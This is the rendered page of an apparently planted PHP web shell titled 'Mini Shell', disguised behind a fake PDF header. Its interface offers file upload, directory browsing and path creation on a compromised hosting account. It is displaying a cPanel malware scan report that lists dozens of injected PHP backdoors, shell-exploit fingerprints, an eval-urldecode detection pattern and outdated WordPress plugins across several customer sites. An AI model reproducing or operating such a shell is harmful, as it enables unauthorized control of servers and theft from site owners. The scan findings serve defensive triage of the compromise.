%PDF-
%PDF-
<form action="#" method="post"><input type="hidden" name="logout" value="1"> <input type="submit" value="logout"></form><!DOCTYPE HTML>
<HTML>
<HEAD>
<link href="" rel="stylesheet" type="text/css">
<title>Mini Shell</title>
<style>
body{
font-family: "Racing Sans One", cursive;
background-color: #e6e6e6;
text-shadow:0px 0px 1px #757575;
}
#content tr:hover{
background-color: #636263;
text-shadow:0px 0px 10px #fff;
}
#content .first{
background-color: silver;
}
#content .first:hover{
background-color: silver;
text-shadow:0px 0px 1px #757575;
}
table{
border: 1px #000000 dotted;
}
H1{
font-family: "Rye", cursive;
}
a{
color: #000;
text-decoration: none;
}
a:hover{
color: #fff;
text-shadow:0px 0px 10px #ffffff;
}
input,select,textarea{
border: 1px #000000 solid;
-moz-border-radius: 5px;
-webkit-border-radius:5px;
border-radius:5px;
}
</style>
</HEAD>
<BODY>
<H1><center><img src="https://s.yimg.com/lq/i/mesg/emoticons7/19.gif"/>
 Mini Shell <img src="https://s.yimg.com/lq/i/mesg/emoticons7/19.gif"/>
 </center></H1>
<table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
<tr><td>Direktori : <a href="?path=/">/</a><a href="?path=//home">home</a>/<a href="?path=//home/eirtvhdf">eirtvhdf</a>/</td></tr><tr><td><form enctype="multipart/form-data" method="POST">
Upload File : <input type="file" name="file" />
<input type="submit" value="upload" />
</form>
</td></tr>
<tr><td><form enctype="multipart/form-data" method="POST">
Create Path : <input type="text" name="path_create" />
<input type="submit" value="create" />
</form></td></td><tr><td>Current File : //home/eirtvhdf/scanreport-eirtvhdf-Jul_26_2024_19h14m.txt</tr></td></table><br /><pre>
----------- SCAN REPORT -----------
TimeStamp: Fri, 26 Jul 2024 19:14:31 -0400
(/usr/sbin/cxs --background --clamdsock /var/clamd --dbreport --defapache nobody --doptions Mv --exploitscan --nofallback --filemax 50000 --noforce --html --ignore /etc/cxs/cxs.ignore.manual --options mMOLfSGchexdnwZDRru --noprobability --qoptions Mv --report /home/eirtvhdf/scanreport-eirtvhdf-Jul_26_2024_19h14m.txt --sizemax 1000000 --ssl --summary --sversionscan --timemax 30 --unofficial --user eirtvhdf --virusscan --vmrssmax 2000000 --waitscan 0 --xtra /etc/cxs/cxs.xtra.manual)


Scanning /home/eirtvhdf:

'/home/eirtvhdf/access-logs'
# Symlink to [/etc/apache2/logs/domlogs/eirtvhdf]
# Scan Timeout (30 secs) while processing:
'/home/eirtvhdf/payments.hire-va.com.zip'

'/home/eirtvhdf/scanreport-eirtvhdf-Aug_25_2023_03h29m.txt'
# ClamAV detected virus = [YARA.r57shell_php_php.UNOFFICIAL]

'/home/eirtvhdf/scanreport-eirtvhdf-Jul_26_2024_19h14m.txt'
# ClamAV detected virus = [YARA.r57shell_php_php.UNOFFICIAL]

'/home/eirtvhdf/.cpanel/live-engine-connector-JP6DjtEysF.sock'
# Socket

'/home/eirtvhdf/.nc_plugin/hidden'
# World writeable directory
# Scan Timeout (30 secs) while processing:
'/home/eirtvhdf/asbatechs.ie/19_07_2024.zip'

'/home/eirtvhdf/asbatechs.ie/logo-offer/root_stripe/stripe/lib/Error/OAuth/TextDecoration.php'
# Regular expression match = [eval\s*\(\s*urldecode\s*\(]

'/home/eirtvhdf/asbatechs.ie/logo-offer/root_stripe/stripe/lib/Error/OAuth/criteria.php'
# Regular expression match = [eval\s*\(\s*urldecode\s*\(]

'/home/eirtvhdf/asbatechs.ie/logo-offer/root_stripe/stripe/lib/Error/OAuth/gateways2.inc.php'
# Regular expression match = [eval\s*\(\s*urldecode\s*\(]

'/home/eirtvhdf/asbatechs.ie/logo-offer/root_stripe/stripe/lib/Error/OAuth/gateways2.php'
# Regular expression match = [eval\s*\(\s*urldecode\s*\(]

'/home/eirtvhdf/asbatechs.ie/logo-offer/root_stripe/stripe/lib/Error/OAuth/thai.php.suspected'
# Regular expression match = [eval\s*\(\s*urldecode\s*\(]

'/home/eirtvhdf/asbatechs.ie/logo-offer/root_stripe/stripe/lib/Error/OAuth/up_site.php.suspected'
# Regular expression match = [eval\s*\(\s*urldecode\s*\(]

'/home/eirtvhdf/asbatechs.ie/logo-offer/root_stripe/stripe/tests/Stripe/Error/edit.php'
# Decode regex match = [decode regex: 1]

'/home/eirtvhdf/asbatechs.ie/logo-offer/root_stripe/stripe/tests/Stripe/Error/edit_record.php'
# Decode regex match = [decode regex: 1]

'/home/eirtvhdf/asbatechs.ie/logo-offer/root_stripe/stripe/tests/Stripe/Issuing/img.php'
# Regular expression match = [eval\s*\(\s*urldecode\s*\(]

'/home/eirtvhdf/cloudsslamllc.com/38e37quq.php'
# Known exploit = [Fingerprint Match (fp)] [PHP Exploit [P2187]]

'/home/eirtvhdf/cloudsslamllc.com/9qvcn016.php'
# Known exploit = [Fingerprint Match (fp)] [PHP Exploit [P2187]]

'/home/eirtvhdf/cloudsslamllc.com/d8zwce6p.php'
# Known exploit = [Fingerprint Match (fp)] [PHP Exploit [P2187]]

'/home/eirtvhdf/cloudsslamllc.com/dxj07sn7.php'
# Known exploit = [Fingerprint Match (fp)] [PHP Exploit [P2187]]

'/home/eirtvhdf/cloudsslamllc.com/hrdyt0oc.php'
# Known exploit = [Fingerprint Match (fp)] [PHP Exploit [P2187]]

'/home/eirtvhdf/cloudsslamllc.com/hrv0b35v.php'
# Known exploit = [Fingerprint Match (fp)] [PHP Exploit [P2187]]

'/home/eirtvhdf/cloudsslamllc.com/l9xgtc5b.php'
# Known exploit = [Fingerprint Match (fp)] [PHP Exploit [P2187]]

'/home/eirtvhdf/cloudsslamllc.com/lnu8hpq5.php'
# Known exploit = [Fingerprint Match (fp)] [PHP Exploit [P2187]]

'/home/eirtvhdf/cloudsslamllc.com/onm7k0z6.php'
# Known exploit = [Fingerprint Match (fp)] [PHP Exploit [P2187]]

'/home/eirtvhdf/cloudsslamllc.com/ruk4iuhv.php'
# Known exploit = [Fingerprint Match (fp)] [PHP Exploit [P2187]]

'/home/eirtvhdf/cloudsslamllc.com/wfw6fkt1.php'
# Known exploit = [Fingerprint Match (fp)] [PHP Exploit [P2187]]

'/home/eirtvhdf/cloudsslamllc.com/wp-content/plugins/akismet/akismet.php'
# Script version check [OLD] [Akismet Anti-Spam v4.1.9 &lt; v5.3.2]

'/home/eirtvhdf/cloudsslamllc.com/wp-content/plugins/bdthemes-element-pack/includes/admin-settings.php'
# Universal decode regex match = [universal decoder]

'/home/eirtvhdf/cloudsslamllc.com/wp-content/plugins/contact-form-7/wp-contact-form-7.php'
# Script version check [OLD] [Contact Form 7 v5.4.2 &lt; v5.9.4]

'/home/eirtvhdf/cloudsslamllc.com/wp-content/plugins/duplicate-page/duplicatepage.php'
# Script version check [OLD] [Duplicate Page v4.4.1 &lt; v4.5.3]

'/home/eirtvhdf/cloudsslamllc.com/wp-content/plugins/elementor/elementor.php'
# Script version check [OLD] [Elementor v3.3.1 &lt; v3.21.5]

'/home/eirtvhdf/cloudsslamllc.com/wp-content/plugins/jetpack/jetpack.php'
# Script version check [OLD] [Jetpack v10.0 &lt; v13.4.2]

'/home/eirtvhdf/cloudsslamllc.com/wp-content/plugins/litespeed-cache/litespeed-cache.php'
# Script version check [OLD] [LiteSpeed Cache v5.2 &lt; v6.2.0.1]

'/home/eirtvhdf/cloudsslamllc.com/wp-content/plugins/mailchimp-for-woocommerce/mailchimp-woocommerce.php'
# Script version check [OLD] [Mailchimp for WooCommerce v2.5.2 &lt; v4.0.2]

'/home/eirtvhdf/cloudsslamllc.com/wp-content/plugins/mailchimp-for-wp/mailchimp-for-wp.php'
# Script version check [OLD] [MC4WP: Mailchimp for WordPress v4.8.6 &lt; v4.9.13]

'/home/eirtvhdf/cloudsslamllc.com/wp-content/plugins/masterslider/admin/includes/msp-sample-sliders.php'
# Universal decode regex match = [universal decoder]

'/home/eirtvhdf/cloudsslamllc.com/wp-content/plugins/masterslider/public/class-master-slider.php'
# Universal decode regex match = [universal decoder]

'/home/eirtvhdf/cloudsslamllc.com/wp-content/plugins/woocommerce/woocommerce.php'
# Script version check [OLD] [WooCommerce v5.5.4 &lt; v8.8.3]

'/home/eirtvhdf/cloudsslamllc.com/wp-content/plugins/woocommerce/includes/admin/class-wc-admin-menus.php'
# Universal decode regex match = [universal decoder]

'/home/eirtvhdf/cloudsslamllc.com/wp-content/plugins/woocommerce/vendor/maxmind-db/reader/ext/maxminddb.c'
# Suspicious file type [application/x-c]

'/home/eirtvhdf/cloudsslamllc.com/wp-content/plugins/woocommerce-services/woocommerce-services.php'
# Script version check [OLD] [WooCommerce Shipping &amp; Tax v1.25.17 &lt; v2.5.7]

'/home/eirtvhdf/cloudsslamllc.com/wp-content/plugins/wp-smush-pro/core/external/dash-notice/wpmudev-dash-notification.php'
# Universal decode regex match = [universal decoder]

'/home/eirtvhdf/cloudsslamllc.com/wp-content/plugins/wp-ulike/admin/classes/class-wp-ulike-admin-panel.php'
# Universal decode regex match = [universal decoder]

'/home/eirtvhdf/cloudsslamllc.com/wp-includes/version.php'
# Script version check [OLD] [Wordpress v6.0 &lt; v6.6.1]

'/home/eirtvhdf/cmytrade.eirtechs.com/nwjcz2hs.php'
# Known exploit = [Fingerprint Match (fp)] [PHP Exploit [P2187]]

'/home/eirtvhdf/cmytrade.eirtechs.com/xqq77gni.php'
# Known exploit = [Fingerprint Match (fp)] [PHP Exploit [P2187]]

'/home/eirtvhdf/comic.eirtechs.com/52otjd84.php'
# Known exploit = [Fingerprint Match (fp)] [PHP Exploit [P2187]]

'/home/eirtvhdf/comic.eirtechs.com/t9iwj401.php'
# Known exploit = [Fingerprint Match (fp)] [PHP Exploit [P2187]]
# Scan Timeout (30 secs) while processing:
'/home/eirtvhdf/courier.eirtechs.com/cms.zip'

'/home/eirtvhdf/courier.eirtechs.com/eiffel.php'
# Regular expression match = [eval\s*\(\s*urldecode\s*\(]

'/home/eirtvhdf/courier.eirtechs.com/members.inc.php'
# Regular expression match = [eval\s*\(\s*urldecode\s*\(]

'/home/eirtvhdf/courier.eirtechs.com/security.log.php'
# Regular expression match = [eval\s*\(\s*urldecode\s*\(]

'/home/eirtvhdf/courier.eirtechs.com/tuto3.php'
# Regular expression match = [eval\s*\(\s*urldecode\s*\(]

'/home/eirtvhdf/courier.eirtechs.com/assets/plugins/codemirror/mode/powershell/radio.php'
# Universal decode regex match = [universal decoder]
# (decoded file [advanced decoder: 14 (depth: 1)]) Known exploit = [Fingerprint Match (fp)] [PHP Shell Exploit [P1295]]

'/home/eirtvhdf/courier.eirtechs.com/assets/plugins/overlayScrollbars/css/AutoParagraph.php'
# Regular expression match = [eval\s*\(\s*urldecode\s*\(]

'/home/eirtvhdf/courier.eirtechs.com/assets/plugins/overlayScrollbars/css/admin.php'
# Regular expression match = [eval\s*\(\s*urldecode\s*\(]

'/home/eirtvhdf/courier.eirtechs.com/assets/plugins/overlayScrollbars/css/antivirus.php.suspected'
# Regular expression match = [eval\s*\(\s*urldecode\s*\(]

'/home/eirtvhdf/courier.eirtechs.com/assets/plugins/overlayScrollbars/css/generic.php'
# Regular expression match = [eval\s*\(\s*urldecode\s*\(]

'/home/eirtvhdf/courier.eirtechs.com/assets/plugins/overlayScrollbars/css/rss.php.suspected'
# Regular expression match = [eval\s*\(\s*urldecode\s*\(]

'/home/eirtvhdf/courier.eirtechs.com/assets/plugins/overlayScrollbars/css/rss_reader.php.suspected'
# Regular expression match = [eval\s*\(\s*urldecode\s*\(]

'/home/eirtvhdf/courier.eirtechs.com/assets/plugins/summernote/font/Yadis.php'
# Decode regex match = [decode regex: 1]

'/home/eirtvhdf/courier.eirtechs.com/assets/plugins/summernote/font/modifcart.php'
# Decode regex match = [decode regex: 1]

'/home/eirtvhdf/courier.eirtechs.com/assets/plugins/summernote/font/pclerror.lib.php'
# Decode regex match = [decode regex: 1]

'/home/eirtvhdf/courier.eirtechs.com/assets/plugins/summernote/font/wp.php'
# Decode regex match = [decode regex: 1]

'/home/eirtvhdf/courier.eirtechs.com/assets/plugins/summernote/plugin/enrol.flatfile.php.suspected'
# Regular expression match = [eval\s*\(\s*urldecode\s*\(]

'/home/eirtvhdf/designbeasts.com/CYEC07_1winners.php'
# Regular expression match = [eval\s*\(\s*urldecode\s*\(]

'/home/eirtvhdf/designbeasts.com/advcheckbox.php'
# Regular expression match = [eval\s*\(\s*urldecode\s*\(]

'/home/eirtvhdf/designbeasts.com/blockform.php'
# Regular expression match = [eval\s*\(\s*urldecode\s*\(]

'/home/eirtvhdf/designbeasts.com/prolog.php'
# Regular expression match = [eval\s*\(\s*urldecode\s*\(]

'/home/eirtvhdf/designbeasts.com/css/img/portfolio/index.php'
# Universal decode regex match = [universal decoder]
# (decoded file [advanced decoder: 14 (depth: 1)]) Known exploit = [Fingerprint Match (fp)] [PHP Shell Exploit [P1295]]

'/home/eirtvhdf/designbeasts.com/img/port/index.php'
# (decoded file [depth: 1]) Known exploit = [Fingerprint Match (fp)] [PHP Excess EVAL Exploit [P1924]]

'/home/eirtvhdf/designbeasts.com/img/portfolio-services/motion/index.php'
# Universal decode regex match = [universal decoder]
# Decode regex match = [decode regex: 1]

'/home/eirtvhdf/designbeasts.com/pay/make-payment/index.php'
# Decode regex match = [decode regex: 1]
# (decoded file [depth: 1]) Decode regex match = [decode regex: 1]
# (decoded file [depth: 2]) ClamAV detected virus = [{HEX}php.cpanel.d0mains.388.UNOFFICIAL]

'/home/eirtvhdf/designbeasts.com/pay/make-payment/phpmailer/examples/index.php'
# Universal decode regex match = [universal decoder]

'/home/eirtvhdf/designbeasts.com/pay/make-payment/phpmailer/examples/test.smtp.gmail.php'
# Decode regex match = [decode regex: 1]

'/home/eirtvhdf/designbeasts.com/pay/make-payment/phpmailer/examples/images/Mail.php'
# Decode regex match = [decode regex: 1]

'/home/eirtvhdf/designbeasts.com/pay/make-payment/phpmailer/examples/images/Util.php'
# Regular expression match = [eval\s*\(\s*urldecode\s*\(]

'/home/eirtvhdf/designbeasts.com/pay/make-payment/phpmailer/test_script/images/eAccelerator.php'
# Regular expression match = [eval\s*\(\s*urldecode\s*\(]

'/home/eirtvhdf/designbeasts.com/pay/make-payment/phpmailer/test_script/styles/function.embed.php'
# Regular expression match = [eval\s*\(\s*urldecode\s*\(]

'/home/eirtvhdf/designbeasts.com/pay/make-payment/phpmailer/test_script/styles/vrtour.php'
# Decode regex match = [decode regex: 1]

'/home/eirtvhdf/designbeasts.com/root_stripe/stripe/lib/index.php'
# Universal decode regex match = [universal decoder]
# (decoded file [advanced decoder: 14 (depth: 1)]) Known exploit = [Fingerprint Match (fp)] [Hacker Sig Exploit [P2180]]

'/home/eirtvhdf/designbeasts.com/root_stripe/stripe/lib/Error/OAuth/FAQ.php'
# Regular expression match = [eval\s*\(\s*urldecode\s*\(]

'/home/eirtvhdf/designbeasts.com/root_stripe/stripe/lib/Error/OAuth/annoucement.php'
# Regular expression match = [eval\s*\(\s*urldecode\s*\(]

'/home/eirtvhdf/designbeasts.com/root_stripe/stripe/lib/Error/OAuth/barcodes5.php'
# Regular expression match = [eval\s*\(\s*urldecode\s*\(]

'/home/eirtvhdf/designbeasts.com/root_stripe/stripe/lib/Error/OAuth/cust_report06.php'
# Decode regex match = [decode regex: 1]

'/home/eirtvhdf/designbeasts.com/root_stripe/stripe/lib/Error/OAuth/drm_unpaiditem.php'
# Regular expression match = [eval\s*\(\s*urldecode\s*\(]

'/home/eirtvhdf/designbeasts.com/root_stripe/stripe/lib/Error/OAuth/phocalongtext.php'
# Regular expression match = [eval\s*\(\s*urldecode\s*\(]

'/home/eirtvhdf/designbeasts.com/root_stripe/stripe/lib/Error/OAuth/upgrade.php'
# Regular expression match = [eval\s*\(\s*urldecode\s*\(]

'/home/eirtvhdf/designbeasts.com/root_stripe/stripe/lib/Terminal/index.php'
# Decode regex match = [decode regex: 1]

'/home/eirtvhdf/designbeasts.com/root_stripe/stripe/tests/Stripe/Error/index.php'
# Decode regex match = [decode regex: 1]

'/home/eirtvhdf/designbeasts.com/root_stripe/stripe/tests/Stripe/HttpClient/latestnews.php'
# Decode regex match = [decode regex: 1]

'/home/eirtvhdf/designbeasts.com/root_stripe/stripe/tests/Stripe/Issuing/del_site.php'
# Decode regex match = [decode regex: 1]

'/home/eirtvhdf/designbeasts.com/root_stripe/stripe/tests/Stripe/Issuing/index.php'
# Decode regex match = [decode regex: 1]

'/home/eirtvhdf/designbeasts.com/root_stripe/stripe/tests/Stripe/Issuing/new.php'
# Regular expression match = [eval\s*\(\s*urldecode\s*\(]

'/home/eirtvhdf/eirebay.com/b96dhb4y.php'
# Known exploit = [Fingerprint Match (fp)] [PHP Exploit [P2187]]

'/home/eirtvhdf/eirebay.com/ojpwknph.php'
# Known exploit = [Fingerprint Match (fp)] [PHP Exploit [P2187]]
# Scan Timeout (30 secs) while processing:
'/home/eirtvhdf/hire-va.com/14September2023.zip'
# Scan Timeout (30 secs) while processing:
'/home/eirtvhdf/hire-va.com/28August2023.zip'

'/home/eirtvhdf/iescooters.ie/1u1krpvf.php'
# Known exploit = [Fingerprint Match (fp)] [PHP Exploit [P2187]]

'/home/eirtvhdf/iescooters.ie/2o7j1pmx.php'
# Known exploit = [Fingerprint Match (fp)] [PHP Exploit [P2187]]

'/home/eirtvhdf/iescooters.ie/47qsqyd9.php'
# Known exploit = [Fingerprint Match (fp)] [PHP Exploit [P2187]]

'/home/eirtvhdf/iescooters.ie/7oxtf9iw.php'
# Known exploit = [Fingerprint Match (fp)] [PHP Exploit [P2187]]

'/home/eirtvhdf/iescooters.ie/bzgyf053.php'
# Known exploit = [Fingerprint Match (fp)] [PHP Exploit [P2187]]

'/home/eirtvhdf/iescooters.ie/dmlz0tyk.php'
# Known exploit = [Fingerprint Match (fp)] [PHP Exploit [P2187]]

'/home/eirtvhdf/iescooters.ie/ise3xcjq.php'
# Known exploit = [Fingerprint Match (fp)] [PHP Exploit [P2187]]

'/home/eirtvhdf/iescooters.ie/nxsnieop.php'
# Known exploit = [Fingerprint Match (fp)] [PHP Exploit [P2187]]

'/home/eirtvhdf/iescooters.ie/rquivy72.php'
# Known exploit = [Fingerprint Match (fp)] [PHP Exploit [P2187]]

'/home/eirtvhdf/iescooters.ie/v4dvz23z.php'
# Known exploit = [Fingerprint Match (fp)] [PHP Exploit [P2187]]

'/home/eirtvhdf/iescooters.ie/wmdf88jr.php'
# Known exploit = [Fingerprint Match (fp)] [PHP Exploit [P2187]]

'/home/eirtvhdf/kgautomotive.eirtechs.com/ixtdwrs6.php'
# Known exploit = [Fingerprint Match (fp)] [PHP Exploit [P2187]]

'/home/eirtvhdf/kgautomotive.eirtechs.com/khfxzhbg.php'
# Known exploit = [Fingerprint Match (fp)] [PHP Exploit [P2187]]
# Scan Timeout (30 secs) while processing:
'/home/eirtvhdf/logodowntown.com/.well-known.zip'
# Scan Timeout (30 secs) while processing:
'/home/eirtvhdf/mail/eirtechs.com/hr/cur/1612823204.M712876P592946.business91.web-hosting.com,S=15861816,W=16067853:2,S'
# Scan Timeout (30 secs) while processing:
'/home/eirtvhdf/mail/eirtechs.com/shabbir/.Drafts/cur/1672431468.M655291P330848.business91.web-hosting.com,S=61478457,W=62320666:2,D'
# Scan Timeout (30 secs) while processing:
'/home/eirtvhdf/mail/eirtechs.com/shabbir/.Sent/cur/1660142247.M787678P2943170.business91.web-hosting.com,S=31401403,W=31831572:2,S'
# Scan Timeout (30 secs) while processing:
'/home/eirtvhdf/mail/eirtechs.com/shabbir/.Sent/cur/1661867585.M950986P532882.business91.web-hosting.com,S=50849016,W=51545591:2,S'
# Scan Timeout (30 secs) while processing:
'/home/eirtvhdf/mail/eirtechs.com/shabbir/.Sent/cur/1663689800.M867814P1304872.business91.web-hosting.com,S=21488283,W=21782656:2,S'
# Scan Timeout (30 secs) while processing:
'/home/eirtvhdf/mail/eirtechs.com/shabbir/.Sent/cur/1664198028.M736303P3044863.business91.web-hosting.com,S=15899077,W=16116891:2,S'
# Scan Timeout (30 secs) while processing:
'/home/eirtvhdf/mail/eirtechs.com/shabbir/.Sent/cur/1664210679.M706698P3946218.business91.web-hosting.com,S=11955745,W=12119541:2,S'
# Scan Timeout (30 secs) while processing:
'/home/eirtvhdf/mail/eirtechs.com/shabbir/.Sent/cur/1664383596.M699777P3997701.business91.web-hosting.com,S=24561963,W=24898445:2,S'
# Scan Timeout (30 secs) while processing:
'/home/eirtvhdf/mail/eirtechs.com/shabbir/.Sent/cur/1664480164.M779028P2829881.business91.web-hosting.com,S=27389147,W=27764355:2,S'
# Scan Timeout (30 secs) while processing:
'/home/eirtvhdf/mail/eirtechs.com/shabbir/.Sent/cur/1665752945.M731469P264021.business91.web-hosting.com,S=40449145,W=41003262:2,S'
# Scan Timeout (30 secs) while processing:
'/home/eirtvhdf/mail/eirtechs.com/shabbir/.Sent/cur/1667755262.M419733P1591912.business91.web-hosting.com,S=28781828,W=29176116:2,S'
# Scan Timeout (30 secs) while processing:
'/home/eirtvhdf/mail/eirtechs.com/shabbir/.Sent/cur/1667856660.M579334P1336335.business91.web-hosting.com,S=14894136,W=15098178:2,S'
# Scan Timeout (30 secs) while processing:
'/home/eirtvhdf/mail/eirtechs.com/shabbir/.Sent/cur/1668084001.M66069P771307.business91.web-hosting.com,S=20227993,W=20505106:2,S'
# Scan Timeout (30 secs) while processing:
'/home/eirtvhdf/mail/eirtechs.com/shabbir/.Sent/cur/1672431700.M17561P273955.business91.web-hosting.com,S=49051432,W=49723403:2,S'
# Scan Timeout (30 secs) while processing:
'/home/eirtvhdf/makkitrust.org/wordpress.zip'

'/home/eirtvhdf/makkitrust.org/nctest/wp-includes/version.php'
# Script version check [OLD] [Wordpress v6.3.1 &lt; v6.6.1]

'/home/eirtvhdf/makkitrust.org/wp-content/plugins/akismet/akismet.php'
# Script version check [OLD] [Akismet Anti-Spam v4.2.2 &lt; v5.3.2]

'/home/eirtvhdf/makkitrust.org/wp-content/plugins/contact-form-7/wp-contact-form-7.php'
# Script version check [OLD] [Contact Form 7 v5.5.6.1 &lt; v5.9.4]

'/home/eirtvhdf/makkitrust.org/wp-content/plugins/litespeed-cache/litespeed-cache.php'
# Script version check [OLD] [LiteSpeed Cache v5.5 &lt; v6.2.0.1]

'/home/eirtvhdf/makkitrust.org/wp-content/plugins/mailchimp-for-wp/mailchimp-for-wp.php'
# Script version check [OLD] [MC4WP: Mailchimp for WordPress v4.8.7 &lt; v4.9.13]

'/home/eirtvhdf/makkitrust.org/wp-includes/version.php'
# Script version check [OLD] [Wordpress v6.3.1 &lt; v6.6.1]

'/home/eirtvhdf/model2transports.com/5qayk8px.php'
# Known exploit = [Fingerprint Match (fp)] [PHP Exploit [P2187]]

'/home/eirtvhdf/model2transports.com/a2xb1oiy.php'
# Known exploit = [Fingerprint Match (fp)] [PHP Exploit [P2187]]

'/home/eirtvhdf/painting.eirtechs.com/1yt86pbg.php'
# Known exploit = [Fingerprint Match (fp)] [PHP Exploit [P2187]]

'/home/eirtvhdf/painting.eirtechs.com/m6yqeibn.php'
# Known exploit = [Fingerprint Match (fp)] [PHP Exploit [P2187]]

'/home/eirtvhdf/party.eirtechs.com/0i9ic93g.php'
# Known exploit = [Fingerprint Match (fp)] [PHP Exploit [P2187]]

'/home/eirtvhdf/party.eirtechs.com/kzqhbyw9.php'
# Known exploit = [Fingerprint Match (fp)] [PHP Exploit [P2187]]

'/home/eirtvhdf/payments.hire-va.com/advanced_search.php'
# Regular expression match = [eval\s*\(\s*urldecode\s*\(]

'/home/eirtvhdf/payments.hire-va.com/creacompte.php'
# Regular expression match = [eval\s*\(\s*urldecode\s*\(]

'/home/eirtvhdf/payments.hire-va.com/english_gb.php'
# Regular expression match = [eval\s*\(\s*urldecode\s*\(]

'/home/eirtvhdf/payments.hire-va.com/threads.inc.php'
# Regular expression match = [eval\s*\(\s*urldecode\s*\(]

'/home/eirtvhdf/payments.hire-va.com/assets/plugins/fancy-file-uploader/cors/wp-login.php'
# Universal decode regex match = [universal decoder]
# (decoded file [advanced decoder: 14 (depth: 1)]) Known exploit = [Fingerprint Match (fp)] [PHP Shell Exploit [P1295]]

'/home/eirtvhdf/payments.hire-va.com/assets/plugins/input-tags/css/global.php'
# Regular expression match = [eval\s*\(\s*urldecode\s*\(]

'/home/eirtvhdf/payments.hire-va.com/assets/plugins/input-tags/css/recette.php.suspected'
# Regular expression match = [eval\s*\(\s*urldecode\s*\(]

'/home/eirtvhdf/payments.hire-va.com/assets/plugins/input-tags/css/recette_bigstory.php'
# Regular expression match = [eval\s*\(\s*urldecode\s*\(]

'/home/eirtvhdf/payments.hire-va.com/assets/plugins/metismenu/css/cma_m_storekit.php'
# Decode regex match = [decode regex: 1]

'/home/eirtvhdf/payments.hire-va.com/assets/plugins/metismenu/css/menu_dir.php.suspected'
# Regular expression match = [eval\s*\(\s*urldecode\s*\(]

'/home/eirtvhdf/payments.hire-va.com/assets/plugins/metismenu/css/swfobject.admin (2).php'
# Decode regex match = [decode regex: 1]

'/home/eirtvhdf/payments.hire-va.com/assets/plugins/metismenu/css/swfobject.php'
# Regular expression match = [eval\s*\(\s*urldecode\s*\(]

'/home/eirtvhdf/payments.hire-va.com/assets/plugins/metismenu/css/wp.admin (2).php.suspected'
# Regular expression match = [eval\s*\(\s*urldecode\s*\(]

'/home/eirtvhdf/payments.hire-va.com/assets/plugins/metismenu/css/wp.m.php'
# Decode regex match = [decode regex: 1]

'/home/eirtvhdf/payments.hire-va.com/assets/plugins/notifications/img/khyastsj.ddd.php.suspected'
# Regular expression match = [eval\s*\(\s*urldecode\s*\(]

'/home/eirtvhdf/payments.hire-va.com/assets/plugins/notifications/sounds/querylib.php'
# Decode regex match = [decode regex: 1]

'/home/eirtvhdf/var/cpanel/styled/current_style'
# Symlink to [/usr/local/cpanel/base/frontend/paper_lantern/styled/dark]

'/home/eirtvhdf/vision-demo.hire-va.com/.tmb'
# World writeable directory

'/home/eirtvhdf/vision-demo.hire-va.com/wp-content/plugins/akismet/akismet.php'
# Script version check [OLD] [Akismet Anti-Spam: Spam Protection v5.1 &lt; v5.3.2]

'/home/eirtvhdf/vision-demo.hire-va.com/wp-content/plugins/mailchimp-for-wp/integrations/wp-comment-form/wp-login.php'
# Universal decode regex match = [universal decoder]
# (decoded file [advanced decoder: 14 (depth: 1)]) Known exploit = [Fingerprint Match (fp)] [PHP Shell Exploit [P1295]]

'/home/eirtvhdf/vision-demo.hire-va.com/wp-content/plugins/woocommerce/woocommerce.php'
# Script version check [OLD] [WooCommerce v8.8.2 &lt; v8.8.3]

'/home/eirtvhdf/vision-demo.hire-va.com/wp-content/plugins/woocommerce/includes/admin/class-wc-admin-menus.php'
# Universal decode regex match = [universal decoder]

'/home/eirtvhdf/vision-demo.hire-va.com/wp-content/plugins/woocommerce/src/Internal/Admin/WcPayWelcomePage.php'
# Universal decode regex match = [universal decoder]

'/home/eirtvhdf/vision-demo.hire-va.com/wp-content/plugins/woocommerce/vendor/maxmind-db/reader/ext/maxminddb.c'
# Suspicious file type [application/x-c]

'/home/eirtvhdf/vision-demo.hire-va.com/wp-content/plugins/wp-file-manager/lib/codemirror/mode/clike/index.html'
# Suspicious file type [application/x-c]

'/home/eirtvhdf/vision-demo.hire-va.com/wp-content/uploads/js_composer'
# World writeable directory

'/home/eirtvhdf/vision-demo.hire-va.com/wp-includes/version.php'
# Script version check [OLD] [Wordpress v6.6 &lt; v6.6.1]

'/home/eirtvhdf/visionsynchomeimprovement.com/wp-content/plugins/akismet/akismet.php'
# Script version check [OLD] [Akismet Anti-Spam: Spam Protection v5.1 &lt; v5.3.2]

'/home/eirtvhdf/visionsynchomeimprovement.com/wp-content/plugins/woocommerce/includes/admin/class-wc-admin-menus.php'
# Universal decode regex match = [universal decoder]

'/home/eirtvhdf/visionsynchomeimprovement.com/wp-content/plugins/woocommerce/src/Internal/Admin/WcPayWelcomePage.php'
# Universal decode regex match = [universal decoder]

'/home/eirtvhdf/visionsynchomeimprovement.com/wp-content/plugins/woocommerce/vendor/maxmind-db/reader/ext/maxminddb.c'
# Suspicious file type [application/x-c]

'/home/eirtvhdf/visionsynchomeimprovement.com/wp-content/plugins/wp-file-manager/lib/codemirror/mode/clike/index.html'
# Suspicious file type [application/x-c]

'/home/eirtvhdf/visionsynchomeimprovement.com/wp-content/plugins/wp-mail-smtp/src/Admin/Area.php'
# Universal decode regex match = [universal decoder]

'/home/eirtvhdf/visionsynchomeimprovement.com/wp-content/plugins/wp-mail-smtp/src/Admin/SetupWizard.php'
# Universal decode regex match = [universal decoder]

'/home/eirtvhdf/visionsynchomeimprovement.com/wp-includes/version.php'
# Script version check [OLD] [Wordpress v6.6 &lt; v6.6.1]

'/home/eirtvhdf/visionsynchomeimprovement.com/wp-includes/css/dist/edit-widgets/index.php'
# Universal decode regex match = [universal decoder]
# (decoded file [advanced decoder: 14 (depth: 1)]) Known exploit = [Fingerprint Match (fp)] [PHP Shell Exploit [P1295]]

'/home/eirtvhdf/wixted.eirtechs.com/Ar.php'
# Regular expression match = [eval\s*\(\s*urldecode\s*\(]

'/home/eirtvhdf/wixted.eirtechs.com/class.api2.php'
# Universal decode regex match = [universal decoder]

'/home/eirtvhdf/wixted.eirtechs.com/cma.php'
# Regular expression match = [eval\s*\(\s*urldecode\s*\(]

'/home/eirtvhdf/wixted.eirtechs.com/config.php'
# Decode regex match = [decode regex: 1]

'/home/eirtvhdf/wixted.eirtechs.com/cust.php'
# Decode regex match = [decode regex: 1]

'/home/eirtvhdf/wixted.eirtechs.com/domain.php'
# Regular expression match = [eval\s*\(\s*urldecode\s*\(]

'/home/eirtvhdf/wixted.eirtechs.com/edit_link.php'
# Regular expression match = [eval\s*\(\s*urldecode\s*\(]

'/home/eirtvhdf/wixted.eirtechs.com/index.php'
# Universal decode regex match = [universal decoder]

